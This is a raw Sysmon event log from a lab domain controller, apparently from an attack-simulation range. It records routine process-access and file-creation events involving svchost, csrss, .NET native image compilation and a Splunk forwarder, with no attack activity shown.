13:49:45.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.917{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.917{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:45.901{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d8-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-18 13:49:45.901 10341000x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.807{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.807{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.760{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.745{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.745{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4303-00000000A301}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:45.682{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\10d0-0\Microsoft.GroupPolicy.Targeting.dll2021-01-18 13:49:45.682 10341000x80000000000000007575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.573{59A5CD1D-91F9-6005-4203-00000000A301}16521336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.432{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.433{59A5CD1D-91F9-6005-4203-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F8-6005-4103-00000000A301}4304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 